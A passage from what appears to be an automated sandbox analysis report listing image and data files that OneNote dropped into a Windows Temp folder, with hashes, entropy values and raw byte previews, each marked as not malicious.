Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{6A897BE4-FB5A-43D2-8229-57B612A04132}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Temp\{6B25EA45-893F-4C96-8169-EEA21082E5E3}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6465253737779166
Encrypted:	false
SSDEEP:	6:RayvDzmJzYyfB3h1RRXUnf9ht0FFBl/FKZoDB58pvDB5JRujlw//0lweI/QHvDBQ:Ra8D8zYyf9/Uft0FFBtOS8p/+Wf/QH/S
MD5:	81BE8E6ACC087DEA291C2495D68D0B81
SHA1:	052AF110276B3EB6FFDDBD72378433A0EBD052BD
SHA-256:	DEE6A8B1F066338E706EF95D5407CF0F9A28C0BCBA8A425F9F73CBDAB4739DC2
SHA-512:	3381A3EA3DA68918D9CA5C0C93E6AB9D1BFA5ED688EA7E3BB7A3FCEE0A41EAEC962FFB83BAABC0F49C8A177EBD8E57EE969FC4096C5B8AE7D929482109A60E51
Malicious:	false
Preview:	./.C..vL....W"v_..J....H..@..NJ"................?.....I...............................................................................................................h..............................................6.6O....V ................E.1...ID.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{6C21ADB4-847D-4D6F-93E0-2C0A883EFD8C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Temp\{74F30B68-90E0-4B73-BC01-8B51887B4806}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6497909125555142
Encrypted:	false
SSDEEP:	6:RaodlFYyfB3h1RRXUnf8rl//prrFFBl/FK9JyBg1BRujlw//0lweI/h1jRujd:RaAYyf9/Uf81prrFFBt0JSg12Wf/h1q
MD5:	D2394DBA63B9AB9D958C32DDC5CB3E9D
SHA1:	6E5D8CE16E2A28FE67FE26D6E6ABADB14C73837A
SHA-256:	7EF98E7C404C6B71D47FE30E2EAC7F10C4D765343549C7F36C4B2876298A4813
SHA-512:	00D92FE2EED623900038150295A8024E63B548A9CA8DDF222F6752099644285530FA57563707BAEDE383699EF8C27AFB5370A11AF43CD40E71DB319919CBD953
Malicious:	false
Preview:	./.C..vL....W"v_.0V...E.'...1].................?.....I...............................................................................................................h.............................................W3..MD....!...........(...4<L.`..Z..^............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{790F52B3-3907-4DC9-A9A1-948DE526378E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6450134833002592
Encrypted:	false
SSDEEP:	6:RaQlQeYyfB3h1RRXUnfqebliMFFBl/FKxyQMBwhQMtBRujlw//0lweI/qThQMtjm:RaPeYyf9/UfqebliMFFBttwp2Wf/qTpq
MD5:	7B2BE2FB6225EF0FFB72404E347358F4
SHA1:	568057FD411D7ACD9FC510D48EC1E21150CC7331
SHA-256:	0AB1834F4538484C5A10AAC77DD84332BD22AF0BBD9B5B2D0ED2B4E725DB62B7
SHA-512:	0532411C8E64FCFAA9275015B0475E8EAC26586CA5C4AC5E6191F41BD7C35C38C1A9BF6D96F21057972DC8FF50F34CE0A0FF325343795429D14BE28FA3D04228
Malicious:	false
Preview:	./.C..vL....W"v__Z...@.O.....Z.................?.....I...............................................................................................................h.............................................-....A....j...........+......A..v>.fA.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{794F75FF-170B-472A-94C7-56FF3681C2F2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	84941
Entropy (8bit):	7.966881945560921
Encrypted:	false
SSDEEP:	1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
MD5:	CB84C108A76C2AFFCAC2551A3C1EAD56
SHA1:	8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
SHA-256:	139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
SHA-512:	6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z\|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

C:\Users\user\AppData\Local\Temp\{7AEF5561-F3C9-4229-BAF8-BF781FC20CDF}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	7.534961703340853
Encrypted:	false
SSDEEP:	48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
MD5:	4FC8500BD304AD127AF4B5E269DFF59B
SHA1:	9A5E3432358A0FCDECE86AEB967319B93A65D14A
SHA-256:	B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
SHA-512:	E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.\|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O.....5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F]..........:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.\|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

C:\Users\user\AppData\Local\Temp\{7D772901-F966-4FD4-BB78-9F4AAF7EA151}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Temp\{7DB5FBCB-7EF0-4946-A08F-D69FFD2F6705}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6500190664496664
Encrypted:	false
SSDEEP:	12:RatbYyf9/UfXgAiyFFBthPMYFPMGWf/OPM6:YtbYyfS/VtZMoMGZM6
MD5:	EF8C98B26E355F255ECFC6F403322288
SHA1:	35F8EDAC9447F3BEB9D73947408EE229BC214535
SHA-256:	8A099B7B4687B24BCA835F3EBA4A921F37F8B7CC6A2A0881E3A1A57D421F7B56
SHA-512:	30B5FF9E463978B834F3FCEAE867E9EB0647C0DD8BC6A6997FD1A045E7BABBA6188CBC63029DE9DC8F81DAC84254F6348F88D4661B7317E6F4E07CC1995F20C2
Malicious:	false
Preview:	./.C..vL....W"v_.S....@C.n3...XF................?.....I...............................................................................................................h............................................#{O...@.w....]..........*`....@....'...............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{7ECE665E-C7EA-461A-8248-4760A309D2C1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Temp\{802F69C8-6BC5-4D92-97B4-24E4C9F7CFA9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Temp\{80CBF155-24CF-44C0-A386-520E4E9EE22A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Temp\{8262CAC0-9831-4BAD-B4BE-84A53F9B6CA1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6468770556345066
Encrypted:	false
SSDEEP:	6:RaQEYyfB3h1RRXUnfbmQ3VNFFBl/FK1SeFBRujlw//0lweI/e/jRujd:RabYyf9/UfbmqNFFBtTM2Wf/e/q
MD5:	1FD97D3AF4A7A0DDCCF1E1635A44A8D0
SHA1:	D660B5726B57A84BB7700CDB5E99861EDAF63A99
SHA-256:	6F9B4DD9FFEB5AB0C1BBDA78B5583762D4334A235720E631C91C5197DCF84861
SHA-512:	30060C78BB3F4748C14FD882BFD44948438340AC7A55EC416F86019A7C2621C8A7AB39C04DD75457CAF998D3BCA7EF8112C46D741B7B931D57B787165E06C748
Malicious:	false
Preview:	./.C..vL....W"v_C;..>.F..M...f.................?.....I...............................................................................................................h............................................5i!...O.bF.............H.{.c.tN....{X&B............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{83B486FB-2911-491A-B4B9-EEC047DBF31D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Temp\{86829F54-A115-4199-A896-D068FEEB2825}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Temp\{8AF9B1F3-C206-4450-B6CE-5687CB4D5DC1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6492350603235056
Encrypted:	false
SSDEEP:	6:Rac3Xq8YyfB3h1RRXUnfDlNm3ltH8VFFBl/FKOhhtIhtJRujlw//0lweI/Izht7m:Racq8Yyf9/UfDDm3UFFBtRMKWf/Iu
MD5:	87EB55B1EC93E264F6650429B084A75D
SHA1:	7C4A1CD164C9C31B1246954B8FC60BB82F44B87D
SHA-256:	CE065444A4E347780E56DBA40BABCCD5C3EC260E19A940E542F0F6FDE66773B9
SHA-512:	5FC9035DF96A57CC68DCBC74D82290170750754AB1B33E12FB5BE419424B64B5D54EA9EA8D9951BFD8740D3124A978C2CA98D882715BA42B8B2B2D06713D9181
Malicious:	false
Preview:	./.C..vL....W"v_~....H.7..T.,................?.....I...............................................................................................................h...........................................w.d.5U4N...qX.v............T..UD.D.%{-.a............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{8D3D6E67-5E01-41E7-BDD2-78D9BEEFC613}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Temp\{8E55B46B-2135-4BC1-A89C-1129556E99A6}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
